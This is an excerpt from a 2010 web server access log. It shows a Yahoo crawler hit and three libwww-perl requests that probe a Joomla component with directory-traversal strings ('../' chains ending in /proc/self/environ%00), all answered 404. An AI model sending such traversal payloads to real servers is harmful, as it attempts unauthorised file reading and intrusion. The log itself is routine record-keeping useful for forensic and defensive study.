72.30.142.216 - - [28/Jun/2010:21:40:17 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.63.144 - - [28/Jun/2010:21:40:36 -0500] "GET /logs/access_log.1274572800/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.63.144 - - [28/Jun/2010:21:40:37 -0500] "GET /*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.63.144 - - [28/Jun/2010:21:40:37 -0500] "GET /logs/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
